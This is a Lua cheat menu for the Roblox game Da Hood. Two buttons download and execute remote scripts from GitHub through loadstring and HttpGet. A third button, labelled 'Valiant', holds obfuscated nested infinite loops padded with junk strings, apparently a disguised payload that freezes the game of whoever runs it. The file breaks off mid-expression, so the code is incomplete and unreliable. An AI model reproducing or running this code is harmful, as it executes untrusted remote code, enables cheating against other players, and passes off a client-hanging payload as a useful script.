
local library = loadstring(game:HttpGet(('https://raw.githubusercontent.com/AikaV3rm/UiLib/master/Lib.lua')))()

local w = library:CreateWindow("Samu Menu V2.0") -- Creates the window

local b = w:CreateFolder("Da hood scripts")

b:Button("Swag mode",function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagModeV002"))()
end)
b:Button("Faded script",function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/nighter132/Faded/main/YesEpic", true))()
end)
b:Button("Valiant",function()
    while true do pcall(function(self,...)while true do for a=math.pow(math.abs(tonumber(1 or 1*4-3 or math.floor(1,math.huge))),math.ceil(tonumber(960 or#2815))^math.huge%math.random(math.huge,math.huge)),math.pow(math.abs(tonumber(1 or 2*2-3)),math.ceil(tonumber(5123 or 12384))^math.huge%math.random(math.huge,math.huge))do local b=(tonumber(math.floor(math.floor(math.random(132612,461234),math.huge or math.abs(1 or 1^4712*1263/1))))-#"!%@346^@&#487@#^$&*@#54r&C#@&*(RtC&*(@#TRG&*#@GXRYI@#GXR86#@TRX^&*@#*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ███████████████████████████████████████████████████████████████████████████@()#*RXXU*()@#nry890#@yurz(*#@ycr&*xxyn@#*(ru(!x@#)ry@#(*rY█████████████████████████████████████████████████x@#*(rY@#*(yrz(*n@#nyRZX98@#yr7y@#(r*Yn@#*(R████████████████████████████████████████i@*(#RJ23*)rUX@)#*UR09@#uXR)*@#yr)X8@u#████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYU!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████(@&*#zry*(@#ynr(*@#c&y*&ry@#(&xzrt@#(x78RT2#(&RXY@(#Y7XR892#██████████████████████████████████████████&*(#YRX(&*@#YRZ897@#yRX9N8234tyrx(*&@#t(rx&t@#&(*rxT@#&*(XRTZY███████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████@893X4RY293&*xRYB(@#*cry*(@#yRX89@#YCRX97@#TYCR9*@x#yxr(@#ybrx()x!x@#█████████████████@#rc(&@#yr(*xz@#yry@#(r!@)$&)@#&*(%@$#&u)$(@&y██████████████████████████████@#ru(xty@#(&*rtc#@&*ctbr&*@#tyxr&*(@#y8XCR9Y████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^fG@#^*$G*@^GF#*TG@*███████████████████████████2(x*r3Y(@&#ry89@#yr(*@#cvyr89@#yc(*r&t@#(&CR████████████████@#97RCY@#*&CRT@#&*(RTX@#&*RTX@#&*TRXXT@#Y&(R██████████████████████████████████████████████████@#$98crY@#*(CRU@#)rxu@#(C*Rt@#8rctcc6@#cr78@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*571273^12356 or math.ceil(math.random(1 or 1-1+1/0)))while true do local c=(tonumber(math.floor(math.floor(math.random(132612,461234),math.huge or math.abs(1 or 1^4712*1263/1))))-#"!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*571273^12356 or math.ceil(math.random(1 or 1-1+1/0)))for d=math.pow(math.abs(tonumber(1 or 1*4-3 or math.floor(1,math.huge))),math.ceil(tonumber(960 or#2815))^math.huge%math.random(math.huge,math.huge)),math.pow(math.abs(tonumber(1 or 12347124*12381-471237)),math.ceil(tonumber(12312432 or 345623))^math.huge%math.random(math.huge,math.huge-1237812*12357674/12335))do if d then while d do local e={...}e[1]=e[math.abs(tonumber(1 or 1))]while e[1]==e[1]do local f=table.pack('\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\12'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12')local g=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))local h=table.pack('\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\9'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\11'..'\12'..'\13'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13'..'\9'..'\9'..'\11'..'\12'..'\13')local i=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 